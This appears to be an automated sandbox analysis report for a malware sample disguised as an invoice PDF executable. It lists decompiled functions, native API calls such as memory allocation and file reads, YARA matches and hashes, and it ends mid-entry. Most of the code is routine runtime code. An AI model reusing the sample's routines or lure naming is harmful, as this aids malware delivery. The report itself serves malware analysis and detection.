Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcmp
String ID: WSH$WScript
API String ID: 1534048567-1019903269
Opcode ID: 3d1b1173d72ddb053b1d78bf1996fd8c99da78053f9083405743fbba01ee82a7
Instruction ID: 34979e90e217bb9efdcdefbd136419db47cfe3186b12309ac817f8e3bf5d9e80
Opcode Fuzzy Hash: 3d1b1173d72ddb053b1d78bf1996fd8c99da78053f9083405743fbba01ee82a7
Instruction Fuzzy Hash: F6F058753002049BC720CFA4DC51EAB37A9AB89350351C13AFA05EB7B1C636E880CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040C016, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C016(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x4158e0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E0040BFFF();
					E0040BFC1();
					_t13 = WriteConsoleW( *0x4158e0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x0040c033
0x0040c037
0x0040c044
0x0040c049
0x0040c064
0x0040c064
0x0040c06a

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,0040BA75,?,00000001,?,00000001,?,0040AF0F,?,?,00000001), ref: 0040C02D
GetLastError.KERNEL32(?,0040BA75,?,00000001,?,00000001,?,0040AF0F,?,?,00000001,?,00000001,?,0040B45B,00409851), ref: 0040C039

Part of subcall function 0040BFFF: CloseHandle.KERNEL32(FFFFFFFE,0040C049,?,0040BA75,?,00000001,?,00000001,?,0040AF0F,?,?,00000001,?,00000001), ref: 0040C00F

___initconout.LIBCMT ref: 0040C049

Part of subcall function 0040BFC1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0040BFF0,0040BA62,00000001,?,0040AF0F,?,?,00000001,?), ref: 0040BFD4

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,0040BA75,?,00000001,?,00000001,?,0040AF0F,?,?,00000001,?), ref: 0040C05E

Memory Dump Source

Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: b9f5e9a20dda26c641918b02f6eb4ee4fadd195ea0e1155ce4a99e2be7c18c92
Instruction ID: 4996e835260c841a90815513ba75f6a0946b9942c97af0d737ffc775e5ba3932
Opcode Fuzzy Hash: b9f5e9a20dda26c641918b02f6eb4ee4fadd195ea0e1155ce4a99e2be7c18c92
Instruction Fuzzy Hash: 6DF01C36501119FBCF222FD1DC049CA3F66FF487B0B048131FA18A6161C6328960EB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404DD6, Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404DD6() {
				void* _t4;
				void* _t8;

				E00405455();
				E004053E9();
				if(E00405149() != 0) {
					_t4 = E004050FB(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00405185();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x00404dd6
0x00404ddb
0x00404de7
0x00404dec
0x00404df1
0x00404df3
0x00404dfe
0x00404df5
0x00404df5
0x00000000
0x00404df5
0x00404de9
0x00404de9
0x00404deb
0x00404deb

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00404DD6
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00404DDB
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00404DE0

Part of subcall function 00405149: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0040515A

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00404DF5

Memory Dump Source

Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: b1b90c0d53e394bb07de617adf9d7015355adfa0c29a78e449e0bafd0537e884
Instruction ID: dc7575cf4b412fe6a21fcc6da34e6022567fc7f4ffee38ddce828381656d3c74
Opcode Fuzzy Hash: b1b90c0d53e394bb07de617adf9d7015355adfa0c29a78e449e0bafd0537e884
Instruction Fuzzy Hash: 27C002A8410A0164DD203AB325132FF1355DC92B8D78014FBAE503B6C3893D054A6D3E

Uniqueness

Uniqueness Score: -1.00%

Function 00407CF6, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00407CF6(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _t51;
				signed int _t60;
				signed int _t61;
				short _t64;
				signed char _t66;
				signed int _t67;
				signed char* _t76;
				signed char* _t77;
				int _t80;
				signed int _t85;
				signed char* _t86;
				short* _t87;
				signed int _t88;
				signed char _t89;
				signed int _t90;
				signed int _t92;
				signed int _t93;
				short _t95;
				signed int _t96;
				intOrPtr _t99;
				signed int _t100;

				_t51 =  *0x4150a8; // 0x90cea005
				_v8 = _t51 ^ _t100;
				_t99 = _a8;
				_t80 = E00407891(__eflags, _a4);
				if(_t80 == 0) {
					L36:
					E00407902(_t99);
					goto L37;
				} else {
					_t95 = 0;
					_t85 = 0;
					_t57 = 0;
					_v32 = 0;
					while( *((intOrPtr*)(_t57 + 0x415510)) != _t80) {
						_t85 = _t85 + 1;
						_t57 = _t57 + 0x30;
						_v32 = _t85;
						if(_t57 < 0xf0) {
							continue;
						} else {
							if(_t80 == 0xfde8 || IsValidCodePage(_t80 & 0x0000ffff) == 0) {
								L22:
							} else {
								if(_t80 != 0xfde9) {
									_t13 =  &_v28; // 0x407b49
									_t57 = GetCPInfo(_t80, _t13);
									__eflags = _t57;
									if(_t57 == 0) {
										__eflags =  *0x415f90 - _t95; // 0x0
										if(__eflags != 0) {
											goto L36;
										} else {
											goto L22;
										}
									} else {
										_t14 = _t99 + 0x18; // 0x40abac
										E00404E20(_t95, _t14, _t95, 0x101);
										 *(_t99 + 4) = _t80;
										__eflags = _v28 - 2;
										 *((intOrPtr*)(_t99 + 0x21c)) = _t95;
										if(_v28 == 2) {
											__eflags = _v22;
											_t76 =  &_v22;
											if(_v22 != 0) {
												while(1) {
													_t89 = _t76[1];
													__eflags = _t89;
													if(_t89 == 0) {
														goto L18;
													}
													_t92 = _t89 & 0x000000ff;
													_t90 =  *_t76 & 0x000000ff;
													while(1) {
														__eflags = _t90 - _t92;
														if(_t90 > _t92) {
															break;
														}
														 *(_t99 + _t90 + 0x19) =  *(_t99 + _t90 + 0x19) | 0x00000004;
														_t90 = _t90 + 1;
														__eflags = _t90;
													}
													_t76 =  &(_t76[2]);
													__eflags =  *_t76;
													if( *_t76 != 0) {
														continue;
													}
													goto L18;
												}
											}
											L18:
											_t25 = _t99 + 0x1a; // 0x40abae
											_t77 = _t25;
											_t88 = 0xfe;
											do {
												 *_t77 =  *_t77 | 0x00000008;
												_t77 =  &(_t77[1]);
												_t88 = _t88 - 1;
												__eflags = _t88;
											} while (_t88 != 0);
											_t26 = _t99 + 4; // 0x89f38bc7
											 *((intOrPtr*)(_t99 + 0x21c)) = E00407853( *_t26);
											_t95 = 1;
										}
										goto L8;
									}
								} else {
									 *(_t99 + 4) = 0xfde9;
									 *((intOrPtr*)(_t99 + 0x21c)) = _t95;
									 *((intOrPtr*)(_t99 + 0x18)) = _t95;
									 *((short*)(_t99 + 0x1c)) = _t95;
									L8:
									 *((intOrPtr*)(_t99 + 8)) = _t95;
									_t12 = _t99 + 0xc; // 0x40aba0
									_t96 = _t12;
									asm("stosd");
									asm("stosd");
									asm("stosd");
									L9:
									E00407967(_t80, _t92, _t96, _t99, _t99);
									L37:
								}
							}
						}
						goto L38;
					}
					_t28 = _t99 + 0x18; // 0x40abac
					E00404E20(_t95, _t28, _t95, 0x101);
					_t60 = _v32 * 0x30;
					__eflags = _t60;
					_v36 = _t60;
					_t61 = _t60 + 0x415520;
					_v32 = _t61;
					do {
						__eflags =  *_t61;
						_t86 = _t61;
						if( *_t61 != 0) {
							while(1) {
								_t66 = _t86[1];
								__eflags = _t66;
								if(_t66 == 0) {
									break;
								}
								_t93 =  *_t86 & 0x000000ff;
								_t67 = _t66 & 0x000000ff;
								while(1) {
									__eflags = _t93 - _t67;
									if(_t93 > _t67) {
										break;
									}
									__eflags = _t93 - 0x100;
									if(_t93 < 0x100) {
										_t34 = _t95 + 0x415508; // 0x8040201
										 *(_t99 + _t93 + 0x19) =  *(_t99 + _t93 + 0x19) |  *_t34;
										_t93 = _t93 + 1;
										__eflags = _t93;
										_t67 = _t86[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t86 =  &(_t86[2]);
								__eflags =  *_t86;
								if( *_t86 != 0) {
									continue;
								}
								break;
							}
							_t61 = _v32;
						}
						_t95 = _t95 + 1;
						_t61 = _t61 + 8;
						_v32 = _t61;
						__eflags = _t95 - 4;
					} while (_t95 < 4);
					 *(_t99 + 4) = _t80;
					 *((intOrPtr*)(_t99 + 8)) = 1;
					 *((intOrPtr*)(_t99 + 0x21c)) = E00407853(_t80);
					_t46 = _t99 + 0xc; // 0x40aba0
					_t87 = _t46;
					_t92 = _v36 + 0x415514;
					_t96 = 6;
					do {
						_t64 =  *_t92;
						_t92 = _t92 + 2;
						 *_t87 = _t64;
						_t49 = _t87 + 2; // 0x498bb05d
						_t87 = _t49;
						_t96 = _t96 - 1;
						__eflags = _t96;
					} while (_t96 != 0);
					goto L9;
				}
				L38:
				return E004032D1(_v8 ^ _t100);
			}

0x00407cfe
0x00407d05
0x00407d0a
0x00407d16
0x00407d1b
0x00407ed1
0x00407ed2
0x00000000
0x00407d21
0x00407d21
0x00407d23
0x00407d25
0x00407d27
0x00407d2a
0x00407d36
0x00407d37
0x00407d3a
0x00407d42
0x00000000
0x00407d44
0x00407d4a
0x00407e21
0x00407d62
0x00407d69
0x00407d91
0x00407d96
0x00407d9c
0x00407d9e
0x00407e15
0x00407e1b
0x00000000
0x00000000
0x00000000
0x00000000
0x00407da0
0x00407da5
0x00407daa
0x00407db2
0x00407db5
0x00407db9
0x00407dbf
0x00407dc1
0x00407dc5
0x00407dc8
0x00407dca
0x00407dca
0x00407dcd
0x00407dcf
0x00000000
0x00000000
0x00407dd1
0x00407dd4
0x00407ddf
0x00407ddf
0x00407de1
0x00000000
0x00000000
0x00407dd9
0x00407dde
0x00407dde
0x00407dde
0x00407de3
0x00407de6
0x00407de9
0x00000000
0x00000000
0x00000000
0x00407de9
0x00407dca
0x00407deb
0x00407deb
0x00407deb
0x00407dee
0x00407df3
0x00407df3
0x00407df6
0x00407df7
0x00407df7
0x00407df7
0x00407dfc
0x00407e06
0x00407e0f
0x00407e0f
0x00000000
0x00407dbf
0x00407d6b
0x00407d6b
0x00407d6e
0x00407d74
0x00407d77
0x00407d7b
0x00407d7b
0x00407d80
0x00407d80
0x00407d83
0x00407d84
0x00407d85
0x00407d86
0x00407d87
0x00407ed7
0x00407ed9
0x00407d69
0x00407d4a
0x00000000
0x00407d42
0x00407e2e
0x00407e33
0x00407e3b
0x00407e3b
0x00407e3f
0x00407e42
0x00407e48
0x00407e4b
0x00407e4b
0x00407e4e
0x00407e50
0x00407e52
0x00407e52
0x00407e55
0x00407e57
0x00000000
0x00000000
0x00407e59
0x00407e5c
0x00407e78
0x00407e78
0x00407e7a
0x00000000
0x00000000
0x00407e61
0x00407e67
0x00407e69
0x00407e6f
0x00407e73
0x00407e73
0x00407e74
0x00000000
0x00407e74
0x00000000
0x00407e67
0x00407e7c
0x00407e7f
0x00407e82
0x00000000
0x00000000
0x00000000
0x00407e82
0x00407e84
0x00407e84
0x00407e87
0x00407e88
0x00407e8b
0x00407e8e
0x00407e8e
0x00407e94
0x00407e97
0x00407ea6
0x00407eaf
0x00407eaf
0x00407eb4
0x00407eba
0x00407ebb
0x00407ebb
0x00407ebe
0x00407ec1
0x00407ec4
0x00407ec4
0x00407ec7
0x00407ec7
0x00407ec7
0x00000000
0x00407ecc
0x00407eda
0x00407ee8

APIs

Part of subcall function 00407891: GetOEMCP.KERNEL32(00000000,00407B02,0040AB94,00000000,00000000,00000000,00000000,?,0040AB94), ref: 004078BC

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00407B49,?,00000000,0040AB94,00013385,?,?,?,?,00000000), ref: 00407D54
GetCPInfo.KERNEL32(00000000,I{@,?,?,00407B49,?,00000000,0040AB94,00013385,?,?,?,?,00000000,00000000), ref: 00407D96

Strings

I{@, xrefs: 00407D91, 00407D94

Memory Dump Source

Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CodeInfoPageValid
String ID: I{@
API String ID: 546120528-975015664
Opcode ID: 297bcef892fb938130ddb1b47e7e08ec90676ea678993b08d06b01fab72ad324
Instruction ID: 3d0df3690b6821d2caad6490c9c6180e114cff45552c7d8042500cfdabfc2bd5
Opcode Fuzzy Hash: 297bcef892fb938130ddb1b47e7e08ec90676ea678993b08d06b01fab72ad324
Instruction Fuzzy Hash: 9E513570D082059EDB218F65C4806BBBBE5EF90304F1480BFD086A72D1E338B942CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 004032D1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E004032D1(void* __ecx, struct _EXCEPTION_POINTERS* _a4) {

				asm("repne jnz 0x5");
				asm("repne ret");
				asm("repne jmp 0x2e");
				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x004032d7
0x004032da
0x004032dc
0x004032e7
0x004032f0
0x00403309

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00403315
___raise_securityfailure.LIBCMT ref: 004033FC

Strings

PYA, xrefs: 004033F7

Memory Dump Source

Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: PYA
API String ID: 3761405300-4183777465
Opcode ID: cd6c3ecaff9722d3dbdc0566155f33ded5f4777213572c9d318174bd142b325b
Instruction ID: c80669a3dc53a52c2e10e32b6e5b84d28a534b7ba786dcc64f87a572768d26a4
Opcode Fuzzy Hash: cd6c3ecaff9722d3dbdc0566155f33ded5f4777213572c9d318174bd142b325b
Instruction Fuzzy Hash: 5C2120B55A1A00DAD310CF54F9C2AD43BE4BF883A4F54923AE9098ABA0E3B44584CF4D

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: INVOICE_90990_PDF.exe PID: 6040 Parent PID: 5748 INVOICE_90990_PDF.exeCOMMON

Executed Functions

Function 0041827A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041827A(void* __ecx, void* __esi, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, char _a36, intOrPtr _a40, char _a44) {
				void* _t21;
				void* _t31;
				intOrPtr* _t33;
				void* _t35;

				 *((intOrPtr*)(__esi + 0x556bf3e3)) =  *((intOrPtr*)(__esi + 0x556bf3e3)) + __ecx;
				_t16 = _a8;
				_t33 = _a8 + 0xc48;
				E00418DD0(_t31, _a8, _t33,  *((intOrPtr*)(_t16 + 0x10)), 0, 0x2a);
				_t6 =  &_a44; // 0x413a21
				_t8 =  &_a36; // 0x413d62
				_t14 =  &_a12; // 0x413d62
				_t21 =  *((intOrPtr*)( *_t33))( *_t14, _a16, _a20, _a24, _a28, _a32,  *_t8, _a40,  *_t6, __esi, _t35); // executed
				return _t21;
			}

0x0041827b
0x00418283
0x0041828f
0x00418297
0x0041829c
0x004182a2
0x004182bd
0x004182c5
0x004182c9

APIs

NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5

Strings

b=A, xrefs: 004182A2, 004182B0
b=A, xrefs: 004182BD, 004182C4
!:A, xrefs: 0041829C, 004182A8

Memory Dump Source

Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: !:A$b=A$b=A
API String ID: 2738559852-704622139
Opcode ID: 1aab453634066371c4b3d1dea44d37b712b2ad37d0e15794effdeea4387f06b4
Instruction ID: 92c5afc51425679be73b9dc0d4a763036db000f3efbd101af76b7c70eac3e128
Opcode Fuzzy Hash: 1aab453634066371c4b3d1dea44d37b712b2ad37d0e15794effdeea4387f06b4
Instruction Fuzzy Hash: D9F0F4B2200208AFCB14DF89DC90EEB77A9AF8C354F15864DFA4D97281C674EC51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00418280, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418280(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DD0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}

0x00418283
0x0041828f
0x00418297
0x0041829c
0x004182a2
0x004182bd
0x004182c5
0x004182c9

APIs

NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5

Strings

b=A, xrefs: 004182A2, 004182B0
b=A, xrefs: 004182BD, 004182C4
!:A, xrefs: 0041829C, 004182A8

Memory Dump Source

Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: !:A$b=A$b=A
API String ID: 2738559852-704622139
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 51f5fae1d88b5840d166f8ea9f31b1482cd02544441b85bb92b9de754d914906
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: F0F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004183AA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9

Strings

9zA, xrefs: 0041840F, 0041841C

Memory Dump Source

Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: 9zA
API String ID: 2167126740-15787895
Opcode ID: 7fb3e7dd18673eb57b719e30b6d31cb29169138a7b2246e5f59d201f6be17d6b
Instruction ID: 30d9030b02a5008919fd8638acaba1f0516d36b3857edc39f57dc779ede0c8d7
Opcode Fuzzy Hash: 7fb3e7dd18673eb57b719e30b6d31cb29169138a7b2246e5f59d201f6be17d6b
Instruction Fuzzy Hash: A601E5B6200209ABCB14DF99DC85DEB77ADAF88654F118609B91897241DA34E8118BB4

Uniqueness

Uniqueness Score: -1.00%

Function 0041818D, Relevance: 1.6, APIs: 1, Instructions: 60filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D

Memory Dump Source

Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d30e2700bc47593ff8244f4b4072785e8a66b3f6641ca7e6b792b6e8aa849593
Instruction ID: c132f922142c0caead4070f9def5d6cfe262326e89a3fae77dd32065351696ae
Opcode Fuzzy Hash: d30e2700bc47593ff8244f4b4072785e8a66b3f6641ca7e6b792b6e8aa849593
Instruction Fuzzy Hash: 0A1190B2604208ABCB08DF98DC85DEB73ADAF8C754F158649BA1997241DA34EC51CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2

Memory Dump Source

Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 4e6e3ee69d5942d72351b9e79d7f2bfe549f68bd28f2ef5b77caac8f1f18b979
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: BB0152B5E0010DA7DB10DAA1DC42FDEB378AB54308F0041A5E918A7281F635EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181CA, Relevance: 1.5, APIs: 1, Instructions: 42filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D

Memory Dump Source

Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b186501b418576f0686bfbd6ff745954568dd86e3dcefedec52d8ce59d259eea
Instruction ID: 8fb2f5b842f47f65a0e2c1dd2c0dbbba10fceaf7396ab2031682cc05f905931f
Opcode Fuzzy Hash: b186501b418576f0686bfbd6ff745954568dd86e3dcefedec52d8ce59d259eea
Instruction Fuzzy Hash: 74019DB2204108AFCB58CF99D886EEB77A9AF9C354F15824CBA1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004181D0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D

Memory Dump Source

Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 4ba06d0811943408d915368c3acdb1aee86cb039c5ce671b45e9a6de03e682c0
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: EAF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004183B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9

Memory Dump Source

Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 5f1ba135279249ad747bfdca3347611d303f78695a7cb9da664d5d0d2719559c
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC81EEB77ADAF88754F118249BE0897281C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004182FA, Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325

Memory Dump Source

Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 5f512cadd4532a9ab5bb65f77e20dc18638f67bd94716a75d06d91c18fe6facb
Instruction ID: 3db5705d8eab3e7b071754d6058680f240d6593ad4d201c3873ffa7bef1ab16b
Opcode Fuzzy Hash: 5f512cadd4532a9ab5bb65f77e20dc18638f67bd94716a75d06d91c18fe6facb
Instruction Fuzzy Hash: DEE086756402047BD710DBA4CC45ED77B58DF443A0F15469DB9499B282D574E500CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00418300, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325

Memory Dump Source

Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: e0948211a995ee673693cff6b37ba25287d5fac55aefcf59dfc2265e20a22c74
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: EAD012752003146BD710EF99DC45ED7775CEF44750F154559BA185B282C570F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00C298F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C298FA

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e71484a11dfe017974fc69e144a0d0c6d11f4940a61fad92790e489654fef0d1
Instruction ID: d12984d1f178512cbba70771ba77223481fbc6bab865cefcb134404df0f1f837
Opcode Fuzzy Hash: e71484a11dfe017974fc69e144a0d0c6d11f4940a61fad92790e489654fef0d1
Instruction Fuzzy Hash: 549002A162100602D60171596404616010A97D0382FA1D032A1024555ECA6589A2F171

Uniqueness

Uniqueness Score: -1.00%

Function 00C29840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C2984A

Memory Dump Source

Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0817085d781d2e05ad367075ed978a984a16577f6ddd2b86cd3528cee871a78b
Instruction ID: 335214df4d5b41456217b03f8535f74051f87f063c6e0bcd80a3a0db2f5478ee
Opcode Fuzzy Hash: 0817085d781d2e05ad367075ed978a984a16577f6ddd2b86cd3528cee871a78b
